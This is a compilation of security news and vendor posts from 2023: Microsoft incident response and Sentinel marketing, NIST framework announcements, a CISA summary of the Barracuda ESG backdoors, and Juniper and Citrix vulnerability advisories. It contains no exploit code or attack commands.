Author: blogmirnet

The cybersecurity industry needs an additional 3.4 million skilled workers to protect against rising digital crime. Your company can use Microsoft Defender Experts for XDR, a managed extended detection and response (MXDR) service, to fill in this workforce gap. Defender Experts for XDR elevates threat-detection capabilities using AI technology combined with human expertise to help you create a strategic plan to prevent future attacks. In this webinar, you will get real-life insights into how managed XDR can help your business: Merge human expertise and AI capabilities to detect, contain, and resolve threats faster Protect email, identity, cloud apps, and endpoint systems Improve efficiency by reducing false detection and providing around-the-clock coverage Register now to enhance your cyber-protection capabilities with managed XDR. Thursday, September 7, 2023 11:00 AM Pacific Time / 2:00 PM Eastern Time

Revolutionize Managed XDR with Microsoft

Register now >

Overview:

Manufacturing supply chains are increasingly critical to maintaining the health, security, and the economic strength of the United States. As supply chains supporting critical infrastructure become more complex and the origins of products become harder to discern, efforts are emerging that improve traceability of goods by exchanging traceability data records using distributed ledger and other blockchain-related technologies. 

This publication introduces the concept of a manufacturing supply chain “traceability chain,” which is comprised of a series of manufacturing traceability records written to industry- specific ecosystem blockchain-related technologies. The traceability chain is intended to provide supply chain visibility from end-user to original components. The Project Description describes a Traceability Chain Minimum Viable Product (MVP) reference implementation as a starting point for further research and refinement. NCCoE cybersecurity experts will address this challenge through collaboration with a Community of Interest, including vendors of cybersecurity solutions. The resulting reference design will detail an approach that can be incorporated across multiple sectors.

To learn more about the decentralized data approach to help secure supply chains in manufacturing and critical infrastructure sectors, visit our project page.

Get Engaged

You can continue to help shape and contribute to this and future projects by joining the NCCoE’s Blockchain Community of Interest here. 

Contact Us:

If you have any questions, please reach out to the NCCoE Blockchain team at [email protected].

Visit the Project Page

Each year, organizations face tens of billions of malware, phishing, and credential threats—with real-world impacts. When an attack succeeds, it can result in grave impacts on any industry. For example, it could delay a police or fire department’s response to an emergency, prevent a hospital from accessing lifesaving equipment or patient data, or shut down a business and hold an organization’s intellectual property hostage.

Managing a security incident involves technical complexities, unknown variables—and often, frustration. Many organizations face a lack of specialized incident response knowledge, long breach resolution times, and difficulty improving their security posture due to ongoing demands on their stretched cybersecurity resources. Microsoft Incident Response is committed to partnering with organizations to combat the growing threat. Our team of experts has the knowledge and experience to help you quickly and effectively respond to any security incident, regardless of its size or complexity.

Microsoft Incident Response

Strengthen your security with an end-to-end portfolio of proactive and reactive incident response services.

Learn more 

Who is the Microsoft Incident Response team?

Protecting customers is core to Microsoft’s mission. That’s why our worldwide Microsoft Incident Response service exists. Provided by Microsoft’s Incident Response team with exceptional skills and expertise in the field in helping organizations detect, respond, and recover from cybersecurity incidents, we mobilize within hours of an incident to help customers remove bad actors, build resilience for future attacks, and mend your defenses.

We’re global: Our Microsoft Incident Response team is available to customers around the clock. We serve 190 countries and resolve attacks from the most sophisticated nation-state threat actor groups down to rogue individual attackers.

We have unparalleled expertise: Since 2008, we’ve provided our customers with incident response services that leverage the full depth and breadth of Microsoft’s entire threat intelligence network, and unparalleled access to our product engineering teams. These security defenders work in concert to help protect the platforms, tools, services, and endpoints that support our online lives.

We’re backed by threat intelligence: Microsoft Incident Response conducts intelligence-driven investigations that tap into the 65 trillion signals collected every day, and track more than 300 unique threat actors, including 160 nation-state actors, 50 ransomware groups, and hundreds of others to detect, investigate, and respond to security incidents. These data signals and our deep knowledge of current threat actors are used to create a threat intelligence feedback loop, which imposes costs on the actors themselves. By sharing information with other organizations and law enforcement agencies, the team helps to disrupt the attackers’ operations and make it more difficult for them to carry out their attacks. The team is committed to continuing to work with its partners to make the internet a safer place for everyone.

We collaborate: Microsoft Incident Response has been collaborating with government agencies and global security organizations to fight cybercrime everywhere it lurks for more than 15 years. Our long-term relationships have spanned the biggest attack recoveries around the globe, and our experience collaborating across internal and external teams helps us to swiftly cut through red tape and resolve critical, urgent security problems for our customers.

Our Microsoft Incident Response team members span several roles to give customers complete and deep expertise to investigate and secure their environment post-security breach and to help prevent a breach in the first place. This team has helped customers of all sizes and industries respond to and recover from cyberattacks. Here are a few examples of how we have helped customers:

• In 2022, we helped the Government of Albania recover from a sophisticated cyberattack. The attack was carried out by a state-sponsored actor, and it involved both ransomware and a wiper. We were able to help the government isolate the affected systems, remove the attackers, and restore its systems to full functionality.
• In 2021, we helped a large financial services company respond to a ransomware attack. The attack was particularly damaging, as it encrypted the company’s customer data. We were able to help the company decrypt the data and restore its systems to full functionality.
• In 2020, we helped a healthcare organization respond to a phishing attack. The attack resulted in the theft of patient data. We were able to help the organization identify the compromised accounts, reset the passwords, and implement additional security controls to prevent future attacks.

These are just a few examples of how the Microsoft Incident Response team has helped customers. We are committed to helping our customers minimize the impact of a cyberattack and restore their systems to full functionality as quickly as possible. Figure 1 shows an example of an anonymized customer journey with Microsoft Incident Response.

Figure 1. This image depicts a customer journey based on a typical ransomware scenario where the customer engaged Microsoft to assist with initial investigation and Entra ID recovery. It outlines four phases: collaboration and tool deployment (green), reactive incident response (blue), recovery with attack surface reduction and eradication plan (red), and compromise recovery with strategic recommendations for modernization (green). The journey involves hardening, tactical monitoring, and presenting modernization recommendations at the end of the Microsoft engagement.

What Microsoft Incident Response does

Up to 83 percent of companies will experience a data breach sometime. Stolen or compromised credentials are both the most common attacks and take the longest to identify (an average of 327 days).¹ We’ve seen the alarming volume of password attacks rise to an estimated 921 attacks every second—a 74 percent increase in just one year.² Our first step when a customer calls during a crisis is to assess their current situation and understand the scope of the incident. Over the years, our team has dealt with issues from crypto malware making an entire environment unavailable to a nation-state attacker maintaining covert administrative persistence in an environment. We work with a customer to identify the line of business apps affected and get systems back online. And as we work through the scope of the incident, we gain the knowledge our experts need to move to the next stage of managing an incident: compromise recovery.

Contrary to how ransomware is sometimes portrayed in the media, it is rare for a single ransomware variant to be managed by one end-to-end “ransomware gang.” Instead, there are separate entities that build malware, gain access to victims, deploy ransomware, and handle extortion negotiations. The industrialization of the criminal ecosystem has led to:

• Access brokers that break in and hand off access (access as a service).
• Malware developers that sell tooling.
• Criminal operators and affiliates that conduct intrusions.
• Encryption and extortion service providers that take over monetization from affiliates (ransomware as a service).

All human-operated ransomware campaigns share common dependencies on security weaknesses. Specifically, attackers usually take advantage of an organization’s poor cyber hygiene, which often includes infrequent patching and failure to implement multifactor authentication.

While every breach recovery is different, the recovery process for customers is often quite similar. A recovery will consist of scoping the compromise, critical hardening, tactical monitoring, and rapid eviction. For example, our experts conduct the following services:

• Restore directory services functionality and increase its security resilience to support the restoration of business.
• Conduct planning, staging, and rapid eviction of attackers from their known span of control, addressing identified accounts, backdoors, and command and control channels.
• Provide a baseline level of protection and detection layers to help prevent a potential re-compromise and to increase the likelihood of rapid detection should there be an indicator of re-compromise in the environment.

To mitigate a compromise, it is important to understand the extent of the damage. This is similar to how doctors diagnose patients before prescribing treatment. Our team can investigate compromises that have been identified by Microsoft or a third party. Defining the scope of the compromise helps us avoid making unnecessary changes to the network. Compromise recovery is about addressing the current attacker. Our team uses the following model to do this: Authentication (who performed the actions?), Access (where did the actions originate from?), and Alteration (what was changed on the system?).

Our teams then work to secure the assets that matter most to organizations, such as Active Directory, Exchange, and Certificate Authorities. Next, we secure the admin path. Simply put, we make sure you, our customers, regain administrative control of your environment. A daunting 93 percent of our investigations reveal insufficient privilege access controls, including unnecessary lateral movement.² Because our large team of experts helps so many customers, we understand what works well to secure an environment quickly. When it comes to tactical, swift recovery actions, we focus on what is strictly necessary for you to take back control first, then move on to other important security measures like hardening high-impact controls to prevent future breaches and putting procedures in place to ensure control can be maintained.

The assessment, containment, and recovery activities are the critical, immediate, and reactive services our experts deploy to help minimize breach impact and regain control. But our proactive services can help customers maintain that control, improve their security stance, and prevent future incidents.

All this expertise is supported by using a number of technologies that are proprietary to Microsoft.

What technologies we leverage

Microsoft products and services, proprietary and forensic tools, and data sourced from the breach incident all help our team act faster to minimize the impact of an incident. Combined with our on-demand specialized experts and our access to threat landscapes across different industries and geographies, these scanning and monitoring tools are part of a comprehensive security offense and defense.

For point-in-time deep scanning:

• Proprietary incident response tooling for Windows and Linux.
• Forensic triage tool on devices of interest.
• Entra ID security and configuration assessment.
• Additional Azure cloud tools.

For continuous monitoring:

• Microsoft Sentinel—Provides a centralized source of event logging. Uses machine learning and artificial intelligence.
• Microsoft Defender for Endpoint—For behavioral, process-level detection. Uses machine learning and artificial intelligence to quickly respond to threats while working side-by-side with third-party antivirus vendors.
• Microsoft Defender for Identity—For detection of common threats and analysis of authentication requests. It examines authentication requests to Entra ID from all operating systems and uses machine learning and artificial intelligence to quickly report many types of threats, such as pass-the-hash, golden and silver tickets, skeleton keys, and many more.
• Microsoft Defender for Cloud Apps—A cloud access security broker that supports various deployment modes including log collection, API connectors, and reverse proxy. It provides rich visibility, control over data travel, and sophisticated analytics to identify and combat cyberthreats across all your Microsoft and third-party cloud services.

Figure 2. This top-down image diagram highlights the Microsoft Incident Response team’s broad visibility with various icons representing distinct aspects of the Microsoft tool advantages. The left column shows how Microsoft Incident Response proprietary endpoint scanners combine with enterprise data, including Active Directory configuration, antivirus logs, and global telemetry from Microsoft Threat Intelligence, which analyzes over 6.5 trillion signals every day to identify emerging threats to protect customers. The blue second column titled Continuous Monitoring illustrates how the team utilizes the toolsets of the Microsoft Defender platform, including Microsoft Defender for Office 365, Microsoft Defender for Endpoint, Microsoft Defender for Cloud Apps, Microsoft Defender for Identity, Microsoft 365 Defender, Microsoft Sentinel, Microsoft Defender Experts for Hunting, and Microsoft Defender for Cloud. Incident response teams collaborate with different teams and technologies and utilize deep scans with proprietary toolsets, while also continuously monitoring the environment through Microsoft Defender.

A tenacious security mindset

Incident response needs vary by customer, so Microsoft Incident Response service options are available as needed or on a retainer basis, for proactive attack preparation, reactive crisis response, and compromise recovery. At the end of the day, your organization’s cybersecurity is mostly about adopting a tenacious security mindset, embraced and supported by everyone in the organization.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and Twitter (@MSFTSecurity) for the latest news and updates on cybersecurity.

---

¹Cost of a Data Breach Report 2022, IBM. 2022.

²Microsoft Digital Defense Report 2022, Microsoft. 2022.

Today, NIST is officially unveiling our new Cybersecurity Framework (CSF) 2.0 Reference Tool. This resource allows users to explore the Draft CSF 2.0 Core (Functions, Categories, Subcategories, Implementation Examples) and offers human and machine-readable versions of the draft Core (in both JSON and Excel formats). Currently, the tool allows users to view and export portions of the Core using key search terms. This tool will ultimately enable users to create their own version of the CSF 2.0 Core with selected Informative References and will provide a simple and streamlined way for users to explore different aspects of the CSF Core. 

NIST will continue to add additional features to the CSF 2.0 Reference Tool in the coming months (for example, Informative References will be added once CSF 2.0 is finalized in early 2024, which will help to show the connection between the CSF and other cybersecurity frameworks, standards, guidelines, and resources).

Other Important News:

• Last week, NIST released a Draft of the NIST Cybersecurity Framework 2.0. The CSF 2.0 draft reflects several major changes, including: an expanded scope, the addition of a sixth function, Govern, and improved and expanded guidance on implementing the CSF—especially for creating profiles. Public comments will be accepted via [email protected] until Friday, November 4, 2023.
• NIST also released a separate discussion draft of the Implementation Examples included in the CSF 2.0 Draft Core. Public comments will be accepted via [email protected] until Friday, November 4, 2023.
• Save the Date: A hybrid Fall workshop will be held on September 19-20, 2023—and will include options for virtual and in-person attendance—at the NIST National Cybersecurity Center of Excellence (registration will open soon).The workshop will serve as another opportunity for the public to provide feedback and comment.

Thank you for sharing in our excitement and for being such an important part of this process. As always, please continue to visit our Journey to CSF 2.0 website for important news, updates, and documents in the coming months—and follow us on X via @NISTcyber.

See the CSF 2.0 Reference Tool!

The Cybersecurity and Infrastructure Security Agency (CISA) has published four Malware Analysis Reports on malware variants associated with exploitation of CVE-2023-2868. CVE-2023-2868 is a remote command injection vulnerability affecting Barracuda Email Security Gateway (ESG) Appliance, versions 5.1.3.001-9.2.0.006. It was exploited as a zero day  as early as October 2022 to gain access to ESG appliances. According to industry reporting, the actors exploited the vulnerability to gain initial access to victim systems and then implanted backdoors to establish and maintain persistence.

CISA analyzed backdoor malware variants obtained from an organization that had been compromised by threat actors exploiting the vulnerability.

WHIRLPOOL – WHIRLPOOL is a backdoor that establishes a Transport Layer Security (TLS) reverse shell to the Command-and-Control (C2) server.  Barracuda Exploit Payload and Backdoor – The payload exploits CVE-2023-2868, leading to dropping and execution of a reverse shell backdoor on ESG appliance. The reverse shell establishes communication with the threat actor’s command and control (C2) server, from where it downloads the SEASPY backdoor to the ESG appliance. The actors delivered the payload to the victim via a phishing email with a malicious attachment. SEASPY – SEASPY is a persistent and passive backdoor that masquerades as a legitimate Barracuda service. SEASPY monitors traffic from the actor’s C2 server. When the right packet sequence is captured, it establishes a Transmission Control Protocol (TCP) reverse shell to the C2 server. The shell allows the threat actors to execute arbitrary commands on the ESG appliance. SUBMARINE – SUBMARINE is a novel persistent backdoor executed with root privileges that lives in a Structured Query Language (SQL) database on the ESG appliance. SUBMARINE comprises multiple artifacts—including a SQL trigger, shell scripts, and a loaded library for a Linux daemon—that together enable execution with root privileges, persistence, command and control, and cleanup. CISA also analyzed artifacts related to SUBMARINE that contained the contents of the compromised SQL database. This malware poses a severe threat for lateral movement.

For more information, including indicators of compromise and YARA rules for detection, on the exploit payload, SEASPY, and SUBMARINE backdoor, see the following Malware Analysis Reports:

SEASPY and WHIRLPOOL Backdoors MAR-10454006.r4.v2.CLEAR Exploit Payload Backdoor MAR-10454006-r3.v1.CLEAR SEASPY Backdoor MAR-10454006-r2.v1.CLEAR SUBMARINE Backdoor MAR-10454006-r1.v2.CLEAR

For more information on CVE-2023-2868 see, Barracuda’s page Barracuda Email Security Gateway Appliance (ESG) Vulnerability  and Mandiant’s blogpost Barracuda ESG Zero-Day Vulnerability (CVE-2023-2868) Exploited Globally by Aggressive and Skilled Actor.

Juniper has released a security advisory to address vulnerabilities in Junos OS on SRX Series and EX Series. A remote cyber threat actor could exploit these vulnerabilities to cause a denial-of service condition.

CISA encourages users and administrators to review Juniper’s Support Portal and apply the necessary updates.

This product is provided subject to this Notification and this Privacy & Use policy.

Description of Problem

A vulnerability has been discovered in the customer-managed ShareFile storage zones controller which, if exploited, could allow an unauthenticated attacker to remotely compromise the customer-managed ShareFile storage zones controller.

This vulnerability affects all currently supported versions of customer-managed ShareFile storage zones controller before version 5.11.24.

This bulletin only applies to customer-managed ShareFile storage zones controllers. Customers using ShareFile-managed storage zones in the cloud do not need to take any action.

The issue has been given the following identifier: 

CVE ID	Affected Products	Description	Pre-requisites	CWE	CVSS
CVE-2023-24489	Citrix Content Collaboration	Improper resource control allows unauthenticated remote compromise	Network access to the ShareFile storage zones controller	CWE-284	9.1

---

What Customers Should Do

This issue has been addressed in the following versions of the customer-managed ShareFile storage zones controller:

• ShareFile storage zones controller 5.11.24 and later versions

Customers are required to upgrade to the fixed version.  

The latest version of ShareFile storage zones controller is available from the following location:

https://www.citrix.com/downloads/sharefile/product-software/sharefile-storagezones-controller-511.html

Instructions for upgrading the Storage Zones Controller are here:

https://docs.sharefile.com/en-us/storage-zones-controller/5-0/upgrade.html

All customer-managed ShareFile storage zones controllers versions prior to the latest version 5.11.24 have been blocked to protect our customers. Customers will be able to reinstate the storage zones controller once the update to 5.11.24 is applied.

Customers should shut down any machine that was running an affected version of the storage zones controller software.

---

Acknowledgements

ShareFile thanks Dylan Pindur of Assetnote for working with us to protect ShareFile customers.

---

What Citrix is Doing

Citrix is notifying customers and channel partners about this potential security issue through the publication of this security bulletin on the Citrix Knowledge Center at https://support.citrix.com/securitybulletins.

---

Obtaining Support on This Issue

If you require technical assistance with this issue, please contact Citrix Technical Support. Contact details for Citrix Technical Support are available at https://www.citrix.com/support/open-a-support-case.

---

Subscribe to Receive Alerts

Citrix strongly recommends that all customers subscribe to receive alerts when a Citrix security bulletin is created or modified at https://support.citrix.com/user/alerts.

---

Reporting Security Vulnerabilities to Citrix

Citrix welcomes input regarding the security of its products and considers any and all potential vulnerabilities seriously. For details on our vulnerability response process and guidance on how to report security-related issues to Citrix, please see the following webpage: https://www.citrix.com/about/trust-center/vulnerability-process.html.

---

Disclaimer

This document is provided on an “as is” basis and does not imply any kind of guarantee or warranty, including the warranties of merchantability or fitness for a particular use. Your use of the information on the document is at your own risk. Citrix reserves the right to change or update this document at any time. Customers are therefore recommended to always view the latest version of this document directly from the Citrix Knowledge Center.

---

Changelog

2023-06-13 T 15:30:00Z	CSAF Update
2023-06-13 T 12:30:00Z	Initial Publication
2023-08-17 T 20:30:00Z	Update recommendations to customers to include shutting down affected systems

Accelerate your deployment and utilization of the latest endpoint management capabilities in support of remote, on-premises, and hybrid work. Join us at Microsoft 365 Virtual Training Day: Managing Windows and Surface Devices from Microsoft Learn to see how to simplify the management of your desktop, devices, and cloud services with Microsoft Endpoint Manager. This free training is relevant across all deployment stages—whether you’re currently using Microsoft Configuration Manager to manage your devices, have started the path to cloud management, or are managing all your endpoints natively with Microsoft Intune. Once you’ve learned the basics of Endpoint Manager, we’ll shift the focus to Microsoft Surface, where you’ll discover how to deploy a secure device. You’ll get the tools and training to put Surface to work—creating a high level of endpoint security through integrated hardware, firmware, software, and identity protection. You will have the opportunity to: Learn how to plan and run an effective deployment of Windows 10. Deploy and manage configurations to organization- and user-owned devices. Explore the versatile functions of Surface. Join us at an upcoming two-part event: Thursday, September 07, 2023 | 11:00 AM – 2:30 PM | (GMT-08:00) Pacific Time (US & Canada) Friday, September 08, 2023 | 11:00 AM – 1:45 PM | (GMT-08:00) Pacific Time (US & Canada) Delivery Language: English Closed Captioning Language(s): English

REGISTER TODAY >

NIST has released the initial public draft (ipd) of a new report for public comment: NIST Internal Report (IR) 8477 ipd, Mapping Relationships Between Documentary Standards, Regulations, Frameworks, and Guidelines: Developing Cybersecurity and Privacy Concept Mappings.

Understanding how the elements of diverse sources of cybersecurity and privacy content are related to each other is an ongoing challenge for people in nearly every organization. This document explains NIST’s proposed approach for identifying and documenting relationships between concepts such as controls, requirements, recommendations, outcomes, technologies, functions, processes, techniques, roles, and skills.

NIST intends for the approach to be used for mapping relationships involving NIST cybersecurity and privacy publications that will be submitted to NIST’s National Online Informative References (OLIR) Program for hosting in NIST’s online Cybersecurity and Privacy Reference Tool (CPRT). This will include mapping the equivalent of the NIST Cybersecurity Framework’s (CSF) 1.1 Informative References in support of CSF 2.0.

By following this approach, NIST and others in the cybersecurity and privacy standards community can jointly establish a single concept system over time that links cybersecurity and privacy concepts from many sources into a cohesive, consistent set of relationship mappings. The mappings can then be used by different audiences to better describe the interrelated aspects of the global cybersecurity and privacy corpus.

The public comment period for this draft is open through October 6, 2023. Download a copy of the draft and submit your comments to [email protected].

Read More

We recently published two solutions in the Sentinel content hub catalog to assist you with better detecting threats and misconfigurations of your Exchange environment. One solution is focused on on-premises Exchange Server and the second is for Exchange Online. Both solutions can be used simultaneously when you have a hybrid Exchange environment.

Why now?

In the past years, we have seen an increase in attacks against messaging environments. Taking control of an Exchange Server or abusing someone’s mailbox can have catastrophic consequences for your organization. Analyzing previous Exchange security incidents highlighted that there are detection gaps and common misconfigurations. Both of which could have easily been avoided. When it comes to Exchange on-premises deployments, it is common to see configurations which have grown organically through upgrades and various administrators.  Management and administrative practices may also not have kept pace with threat actors and have not changed in decades. Many configuration components are simply overlooked. Logs are rarely collected and centralized, either slowing or preventing investigations. 

Introducing Microsoft Exchange Security solutions

The two solutions aim to close detections gaps and proactively identifying misconfigurations before they become a security incident. They allow collections of critical logs, detect misconfigurations and present the information in dynamic dashboards.

The Exchange Server solution looks at the following core components:

• standard and custom RBAC delegation
• remote domain configuration
• local administrators permissions
• high privileged groups members
• POP/IMAP configuration
• send and receive connector configuration

The Exchange Online solution looks at the following core components:

• standard and custom RBAC delegation

Amongst the scenarios the solution enables, you will find the following:

• Alert you when an administrative cmdlet is executed against a VIP user to exfiltrate content or modify who can access it (you decide who are the VIPs).
• Detect if a server-oriented cmdlet and a user-oriented cmdlet which are monitored are launched by the same user on the same server in 10 minutes delay.
• Improve your Exchange security posture by exposing misconfiguration on your Exchange environments.
• Detect the usage of custom Exchange RBAC configuration that can put your environment at risk.
• Report on admin activities to optimize your delegation model.

How does it work?

The base of the solution uses a script which directly connects to Microsoft Sentinel and uploads the results of security configurations (this script runs on-premises for the on-premises version, and in an Azure Automation runbook for the online version). It uses the Log Analytics ingestion API to directly send data to your Sentinel workspace.

 Note that the solution does support the collection of multiple Exchange organizations and multi-tenants within the same Sentinel workspace.

 You can also configure the solution to upload additional data such as audit logs, security events of Exchange servers and/or domain controllers and IIS log files by using either the Azure Monitoring Agent with Azure Arc or the Microsoft Monitoring Agent

• You can then explore the data with carefully crafted workbooks to visualize your posture and trigger incidents with analytics rules to alert you to important security events.
  

Your Exchange security posture quickly visualized:

A workbook helping you to apply the Least Privilege principle:

 To monitor activities on mailboxes and especially on designated VIP mailboxes:

Data ingestion

To keep the solution cost effective, you can select the level of data you wish to collect from your environment. The more data you collect and the more detection scenarios you enable. To help you pick the right collection level, you can refer to this table:

Collection option	Data to upload	Volume	Valuable for workbooks	Valuable for hunting
0	Configuration scripts result	Low	High	Low
1	Exchange related event logs of Exchange servers	Medium	Medium	Medium
2	Security/Application/System event logs of Exchange servers	Medium	Low to Medium	Medium
3	Security logs of domain controllers located in the Exchange sites	Medium to High	Low to Medium	Medium
4	Security logs of all domain controllers	High	Low to Medium	Medium to High
5	IIS logs of Exchange servers	High	Low	High
6	Message tracking of all Exchange servers	High	Low	Low to Medium
7	HTTP proxy logs of all Exchange servers	High	High	High

Except for collection option 0, all other options are independent. They are deployed as a Microsoft Sentinel Connector using DCR rules or Azure Monitor Agent and you can activate/deactivate the options when you want.

Get started!

Connect to your Microsoft Sentinel workspace, click on the Content hub blade and search for Microsoft Exchange Security:

Review the details and click Install to get started!

Alternatively, you can navigate to the respective solutions landing page in Azure:

• Microsoft Exchange Security for Exchange On-Premises
• Microsoft Exchange Security for Exchange Online